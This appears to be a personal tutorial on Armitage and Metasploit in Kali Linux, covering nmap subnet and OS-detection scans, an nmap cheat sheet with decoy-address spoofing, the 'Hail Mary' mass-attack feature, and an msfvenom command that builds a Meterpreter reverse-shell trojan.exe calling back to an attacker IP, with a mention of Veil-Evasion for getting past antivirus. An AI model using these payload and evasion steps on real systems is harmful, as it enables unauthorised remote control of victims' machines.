Metasploit & Armitage

Armitage is a GUI front end for Metasploit. It saves you from having to remember all the CLI commands in Metasploit, and it visualizes scanning results. Both tools are available in Kali Linux. If you can use one of them, you can use the other automatically.

I tried both. Below is the guide to discovering all online machines in a subnet by using Armitage:

1, Hosts tab -> clear database

This prepares a clean environment for the new discovery.

2, Hosts -> nmap scan -> quick scan (detect OS) -> input the subnet IP for scanning

This will take a couple of minutes to complete, depending on how big the subnet is. This step can also be done with the plain nmap command from the CLI.

After this step, you should be able to see the operating system running on each machine; however, it cannot recognize Windows 10. We can look at how nmap detects the OS. In short, nmap will scan some special ports of the victim and see if those ports are open, especially 139 and 445. If these ports are open, nmap can very likely use them to detect the OS of the victim, more details here.

“One of Nmap’s best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines practically every bit in the responses. After performing dozens of tests such as TCP ISN sampling, TCP options support and ordering, IP ID sampling, and the initial window size check, Nmap compares the results to its nmap-os-db database of more than 2,600 known OS fingerprints and prints out the OS details if there is a match. Each fingerprint includes a freeform textual description of the OS, and a classification which provides the vendor name (e.g. Sun), underlying OS (e.g. Solaris), OS generation (e.g. 10), and device type (general purpose, router, switch, game console, etc). Most fingerprints also have a Common Platform Enumeration (CPE) representation, like cpe:/o:linux:linux_kernel:2.6.”

When trying to scan a Windows 10 machine, we see a message like "all ports are filtered". Below is an example of scanning a Windows 10 machine:

root@kali:/# nmap -O

Starting Nmap 7.40 ( ) at 2017-10-05 04:58 EDT
Nmap scan report for juhao.lan (
Host is up (0.014s latency).
All 1000 scanned ports on juhao.lan ( are filtered
MAC Address: AC:D1:B8:E4:3F:E7 (Hon Hai Precision Ind.)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 24.20 seconds
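
Added example (not part of the original post): a small Python parser for nmap's normal output that records, per host, the open ports and the OS-detection result, and flags hosts like the Windows 10 machine above where every scanned port is filtered. The sample output, host names and 192.0.2.x addresses are constructed for illustration.

```python
import re

# Constructed sample in the format of `nmap -O` normal output; host names and
# addresses (192.0.2.0/24 documentation range) are made up for illustration.
SAMPLE = """\
Nmap scan report for win10.lan (192.0.2.10)
Host is up (0.014s latency).
All 1000 scanned ports on win10.lan (192.0.2.10) are filtered
Too many fingerprints match this host to give specific OS details

Nmap scan report for win7.lan (192.0.2.20)
Host is up (0.0020s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Running: Microsoft Windows 7
OS details: Microsoft Windows 7 SP1
"""

REPORT = re.compile(r"^Nmap scan report for (?:(\S+) \()?([0-9a-fA-F.:]+)\)?$")
PORT = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

def parse_hosts(text):
    """Split nmap normal output into one record per scanned host."""
    hosts = []
    for line in text.splitlines():
        m = REPORT.match(line)
        if m:
            hosts.append({"name": m.group(1), "ip": m.group(2), "open": [],
                          "all_filtered": False, "os": None})
        elif not hosts:
            continue  # banner lines before the first host report
        elif re.match(r"^All \d+ scanned ports on .* are filtered", line):
            hosts[-1]["all_filtered"] = True
        elif line.startswith("OS details: "):
            hosts[-1]["os"] = line[len("OS details: "):]
        elif (p := PORT.match(line)) and p.group(3) == "open":
            hosts[-1]["open"].append(int(p.group(1)))
    return hosts

def triage(host):
    """Explain the OS-detection outcome for one host record."""
    if host["os"]:
        return "identified: " + host["os"]
    if host["all_filtered"]:
        return "unknown: all scanned ports filtered, OS probes got no usable responses"
    return "unknown: no OS match"
```

Running `[triage(h) for h in parse_hosts(SAMPLE)]` gives one verdict per host, which makes it easy to list the machines on your own subnet whose firewall filters every probed port.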

3, When scanning is completed, all online machines will be listed as icons in the workspace. We can use attacks -> find attacks to find all possible attacks against each machine. We can also use attacks -> Hail Mary to launch massive attacks against the target machines.

Unfortunately, I tried Hail Mary against my Windows 7 and Windows 8.1 machines, and neither was compromised. Again, it looks like all those attacks in Metasploit are already well known and cannot be a serious threat in the real world.

In order to implement a successful attack, we can also utilize a payload in Metasploit. I tested the classic payload windows/meterpreter/reverse_tcp.

Here is the guide on how to generate a malicious .exe, in short:

# msfvenom -p windows/meterpreter/reverse_tcp  –platform windows-a x86 -f exe LHOST=“attacker ip” LPORT=4444 -o /root/Desktop/trojan.exe

Msfvenom is a tool used to generate malicious code for a Metasploit payload. The code needs to be transferred to the target machine and run there in order to create a backdoor to the attacker's machine.

The real challenge is actually getting this .exe onto the victim machine. I am using my own machine for the test but cannot even load the code onto it. I tried sending myself an email, but the attachment was blocked because Google has detected malware in the attachment. I tried copying the file to a USB drive, but as soon as I inserted the USB drive into my test machine the malware was removed by Windows Defender. The author recommended using some encoder, for example Veil-Evasion, to disguise the .exe file; I need to find time to try this.






nmap -sn 192.178.1.*
TCP SYN scan, ports 1-1000
TCP SYN scan, protocol number, service version, operating system
nmap -sS -p0 -sV -O
quick scanning
nmap -T5
TCP connect scan for port 80 only
nmap -sT -p80
use faked source IP addresses together with the real source IP
nmap -sS -D (faked src addr)
scan only the 100 most common ports instead of 1000 ports (--exclude leaves out the listed hosts)
nmap -F --exclude (hosts to skip)
by default nmap pings first and scans the 1000 ports only if it gets a response; -Pn skips the ping and scans anyway
nmap -Pn
scan an IPv6 address
nmap -6 ipv6 address
nmap --iflist
scan the 20 most popular ports
nmap --top-ports 20
run nmap with scripts
nmap --script=default
nmap --script-help all to list all scripts that can be used
enable all advanced/aggressive scan options
nmap -A -T5